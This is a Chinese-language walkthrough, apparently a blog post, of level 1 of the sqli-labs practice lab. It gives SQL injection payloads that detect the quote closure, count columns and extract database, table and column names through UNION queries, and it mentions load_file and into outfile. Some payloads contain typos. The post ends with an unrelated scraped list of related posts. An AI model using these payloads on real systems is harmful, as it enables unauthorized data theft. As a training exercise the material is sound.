sqli-labs第一关的闯关
第一关:单引号错误
SQL的注入最终是为了拿到数据库的文件或者数据。
刚进页面,显示需要输入id。于是我们使用在地址栏后面加上 ?id=1
第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。
如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句
echo “$sql
”
- 判断有无注入点:
老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
尝试闭合符号闭合参数。闭合符号有四种:‘、"、’)、")
依据:id是否有被作为可控制的参数传入后台执行
因此我们依次尝试
?id=1‘、?id=1‘)、?id=1"、?id=1")
(自行尝试,然后理解一下如果没有错误回显,如何判断闭合符号)
当?id=1‘、?id=1‘)时页面报错, near ‘‘1’’ LIMIT 0,1’ at line 1
第一个和最后一个引号之间的是报错内容,1’是我们传进去的,1前后面还有一个引号,说明闭合符号是 ‘ ,传入sql中执行的内容是字符串类型的。
LIMIT 0,1:作为参数的意思是从第0条数据开始,只显示一条数据。
因此
也可以再尝试?id=1"、?id=1") 增加判断准确定性 ——显示正常。说明单引号为闭合符号。且id=1dasdasdas时,与id=1显示一致,说明后面字符被sql忽略,说明id参数为数字字符型,非字符型。
?id=1‘ and’1‘=’1和?id=1‘ and’1‘=’2
前者正常,后者报错。回显不一致。说明存在注入点。
2. 判断列数
猜列数有多少段:order by 数字。后面跟着‘limit 0,1直接用#或–+注释掉(也是绕过),注意#需要换成url编码后的%23输入到地址栏中
不一一演示了。在我这里,数字大于4会报错,小于等于4不会出错。所以列数为4。
- 接下来就是注入的目的了,拿到数据库数据。
使用union查询语句(联合查询)。前面语句要报错才能正常执行union之后的语句。
2,3回复有显示,说明2,3两个点的数据可以出现,因此可以注入。
我们据此可以爆出所有的当前数据库、数据库版本、当前用户。
数据库版本再5.0以上时,因为information_schema数据库里面拥有这些所有的数据字段,还可以爆出所有数据库名,所有用户名,所有字段名。
使用语句
?id=-1’ union select 1,group(schema_name),3,4 from information_schema.schemata–+
?id=-1’ union select 1,group(table_name),3,4 from information_schema.tables where table_shcema=‘security’–+
?id=-1’ union select 1,group(column_name),3,4 from information_schema.columns where table_schema=‘security’ and table_name=‘users’
至此,数据已经完全展现在你眼前了
- 还可以下载数据,写入数据(写入需要修改my.ini文件),我没去下载,不演示了(PS:不知道可不可以)
load_file()
into outfile()或者into dumpfile()
题外话:没有securoty这个数据库,以及security的users用户表里面没有数据这件事,需要自己手动去数据库里面添加,这不算是第一关的内容,但确实是刚开始坑能会遇到的问题。
sqli-labs第一关的闯关相关推荐
- Cheat Engine Tutorial 闯关手记
Cheat Engine Tutorial 闯关手记 第一关 Cheat Engine 能做什么?修改游戏的数值,就象<金山游侠V>,但它能胜任动态地址的查找:制作游戏专用的修改器,补丁, ...
- Python程序员面试牢记这些,助你闯关成功!
Python程序员的面试不同于其他的岗位,在面试过程中经常会遇到笔试.面试.复试等环节,面试就如同闯关."闯关"过程中,面试官对于Python开发人员的基础非常看重,那么如何在面试 ...
- 小白友好——C++基于EeayX简单开发的豪华版贪吃蛇[单人模式+双蛇对战+闯关模式(地图跳转)+排行榜+音乐]
目录 注意:该项目源码开源,在本文章最底下链接处获取,源码中附有大量注释. 游戏展示 单人模式 斗蛇模式 闯关模式 项目代码解析 一.整体框架结构 二.界面代码解析 1.主程序 2.主菜单 主菜单背景 ...
- Python挑战游戏( PythonChallenge)闯关之路Level- 3
闯关过程 闯关入口:http://www.pythonchallenge.com/pc/def/equality.html 根据页面提示, 应该是寻找字符串, 一个小写字母两边都是3个大写字母,类似如 ...
- 黑板课爬虫闯关第一关
之前也没有系统的学习过python,看其他源码的时候也是似懂非懂的看着理解意思.最近比较有空,就想更系统的学习一下,在知乎上看到大神推荐了一个Python爬虫闯关网站,便想试试. 下面是第一关的介绍, ...
- sqli-labs闯关记录(1~65关)
sql漏洞闯关记录笔记(1~15) 1.基本知识 首先我们先了解SQL注入是什么: SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一,其实就是恶意用户通过在可提交 ...
- 光棍节程序员闯关秀(总共10关)
程序员闯关大挑战: https://1111.segmentfault.com/ 仓鼠演示7k7k.4399小游戏: http://cdn.abowman.com/widgets/hamster/ha ...
- 一文解析|首个上榜科创板的机器人企业,江苏北人“闯关记”
来源:机器人大讲堂 摘要:随着上交所公布了科创板首批受理上市申请的企业名单,这九家企业的每一家都被拿到放大镜下细细观察,评头论足.而其中,江苏北人作为登上科创版的首家机器人企业似乎受到的关注最多. 江 ...
- 《光棍节程序员闯关秀》闯关攻略
https://1111.segmentfault.com<光棍节程序员闯关秀> 程序员们,欢迎来攻!!! 在之前的基础上,重新整理了一遍,之前才闯到第8 ...
最新文章
- 交换机基础设置之vtp管理vlan设置
- php获取网页输出,PHP 利用AJAX获取网页并输出的实现代码(Zjmainstay)_PHP教程
- Git 和 Github 秘籍
- 9550电机_三千瓦的单相电机和同三千瓦三相电机马力相等吗?
- Cookie介绍与操作
- Android蓝牙服务
- 可用性测试启发式评估十条原则介绍
- java1.8 ojdbc14.jar_ojdbc14_g.jar与ojdbc14.jar区别
- 小程序使用微信收货地址
- uniapp 上传图片 + 预览图片 + 删除图片
- lol美服服务器修改密码,如何修改LOL美服密码?英雄联盟美服账号密码和邮箱修改教程...
- VSCode升级后启动不了~
- Taro——taro安装及taro创建项目相关命令
- 生成扩散模型漫谈:统一扩散模型(应用篇)
- 联发科彻底慌了,不仅高端市场保不住,中端市场也被高通压制
- 第三章 非常高的水平层
- python判断手机号码是否正确_Python:尝试检查有效的电话号码
- 怎么在Windows下使用Makefile文件
- 看图学中文版VS2010 Workflow 4.0 (五)
- xmind8 pro破解